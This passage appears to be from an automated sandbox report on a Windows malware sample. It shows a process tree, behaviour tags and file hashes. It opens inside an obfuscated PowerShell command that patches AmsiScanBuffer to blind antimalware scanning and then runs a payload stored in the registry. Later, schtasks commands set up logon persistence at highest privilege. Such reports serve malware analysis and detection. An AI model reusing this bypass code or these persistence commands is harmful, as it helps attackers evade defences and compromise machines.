orFunctionPointer($kZbjChfNHhZZlw,$jJiNDXTJQMVZhwCNKMU).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+'l'+'');$hlBjUZFnLaaOUEXtE=$yoBbRdKqOjhWhI.Invoke($Null,@([Object]$xBwGqyT,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+'r'+'')));$tXruEaCtZn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WCAkmrMLoTGQTYyTC,$pCUWtQpbbadpCQxpwMtCPQ).Invoke($hlBjUZFnLaaOUEXtE,[uint32]8,4,[ref]$tXruEaCtZn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hlBjUZFnLaaOUEXtE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WCAkmrMLoTGQTYyTC,$pCUWtQpbbadpCQxpwMtCPQ).Invoke($hlBjUZFnLaaOUEXtE,[uint32]8,0x20,[ref]$tXruEaCtZn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7s'+'t'+''+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3544
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
PID:1136
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1192
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1236
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1244
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1260
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1412
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1436
-
c:\windows\system32\sihost.exesihost.exe2⤵PID:2820
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1476
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1548
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1588
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1692
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1900
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1928
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1628
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:2096
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2248
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2484
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2680
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
- Drops file in System32 directory
PID:2696
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2724
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2744
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2756
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2844
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3008
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3204
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3388 -
C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:312 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:5008
-
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:4460
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4284
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3948
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2196
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4768
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:660
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:2080
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2788
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:3880
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵PID:5096
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:3236
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4524
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2716
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD5a0f5aa5764c4f66eee82f857f9f447b6
SHA13c3a780d020cb3eb3088223443fe813abb95dccd
SHA25643c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3
SHA512458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
Filesize412B
MD5ba21212bba88c822e85f29054c34585b
SHA1a3ca55d8006ab68ea928d62fac3e65eac62765a0
SHA256b2b5c4a4604c886d29cfb432c1b03bc9e190ae991db9ec538ce419333c039e19
SHA512ffa7587f93cd1025eb2d185c84222578d55ed7abf0acd71a3a0bb83c4a3f186ae4e6528cca3858f50c90e7acbfa3cf8f5fb5aa42c3d64d60329339421d308dd3